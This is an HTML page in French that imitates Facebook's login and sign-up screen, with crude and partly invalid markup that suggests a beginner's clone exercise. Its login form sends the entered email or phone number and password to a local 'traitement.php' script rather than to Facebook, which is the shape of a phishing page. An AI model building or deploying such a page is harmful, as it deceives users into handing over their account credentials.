<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <link rel="stylesheet" href="hamouda.css">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook</title>
</head>

<body>
    <div class="div-para">
        <strong class="logo">facebook</strong>
        <a href="https://www.facebook.com/login/identify/?ctx=recover&ars=royal_blue_bar"  class="lien">Informations de compte oubliées</a>
                   
        <form method="post" action="traitement.php" class="form-con">
                <label1 for="e-mail ou mobile">Adresse e-mail ou mobile</label1>
                <input type="text1" id1="Adresse e-mail ou mobile" name="Adresse e-mail ou mobile"><br>
                <label2 for="text">Mot de passe</label2>
                <input type="text2" id2="Mot de passe" name="Mot de passe"><br>
                <input type="submit" value="Connexion">
            </form>
    </div>
    <div class="div-top">
        <p class="partage-fac">Avec Facebook, partagez et restez en contact<br>avec votre entourage</p>
        <img src="https://static.xx.fbcdn.net/rsrc.php/v3/yi/r/OBaVg52wtTZ.png" alt="facebook">
        <h1>Inscription</h1>
        <h2>C'est rapide et facile.</h2>
        <input type="text3" id="prénom" name="prénom" autocomplete="on" placeholder="Prénom">
        <input type="text4" id="Nom de famille" name="Nom de famille" autocomplete="on" placeholder="Nom de famille">
        <input type="text5" id="Numéro de mobile ou e-mail" name="Numéro de mobile ou e-mail" autocomplete="on"
            placeholder="Numéro de mobile ou e-mail">
        <input type="text6" id="Nouveau mot de passe" name="Nouveau mot de passe" autocomplete="on"
            placeholder="Nouveau mot de passe">
        <h3>Date de naissance</h3>
        <select name="jour">
            <optgroup label="Jour">
                <option value="un">1</option>
                <option value="deux">2</option>
                <option value="trois">3</option>
                <option value="quatre">4</option>
            </optgroup>
        </select>
        <select name="mois">
            <optgroup label="mois">
                <option value="Janvier">Jan</option>
                <option value="Février">Fév</option>
                <option value="Mars">Mar</option>
                <option value="Avril">Avr</option>
                <option value="Mai">Mai</option>
                <option value="Juin">Juin</option>
                <option value="Juillet">Jui</option>
                <option value="Aout">Aout</option>
                <option value="Septembre">Sept</option>
                <option value="Octobre">Oct</option>
                <option value="Novembre">Nov</option>
                <option value="Décembre">Déc</option>
            </optgroup>
        </select>
        <select name="Année">
            <optgroup label="Année">
                <option value="2017">2017</option>
                <option value="2018">2018</option>
                <option value="2019">2019</option>
                <option value="2020">2020</option>
            </optgroup>
        </select>
        <h4>Genre</h4>
        <div class="div3">
            <input type="radio" id="Femme" name="sexe" value="Femme">
            <label for="Femme">Femme</label>
            <input type="radio" id="Homme" name="sexe" value="Homme">
            <label for="Homme">Homme</label>
            <input type="radio" id="Personnalisé" name="sexe" value="Personnalisé">
            <label for="Personnalisé">Personnalisé</label>
        </div>

        <button name="button">Inscription</button>
        <h5>En appuyant sur Inscription, vous acceptez nos <a
                href="https://www.facebook.com/legal/terms/update">Conditions<br>générales</a>,notre <a
                href="https://www.facebook.com/about/privacy/update">Politique d'utilisation de données</a>et
            notre<br><a href="https://www.facebook.com/policies/cookies/">Politique d'utilisations de cookies</a>,Vous
            recevrez peut-etre des<br>notifications par texto de notre part et vous pouvez à tout<br>moment vous
            désabonner </h5>
        <h6><a href="https://www.facebook.com/pages/create/?ref_type=registration_form">Créer une Page</a> pour une
            célébrité, un groupe ou une entreprise</h6>

    </div>
</body>

</html>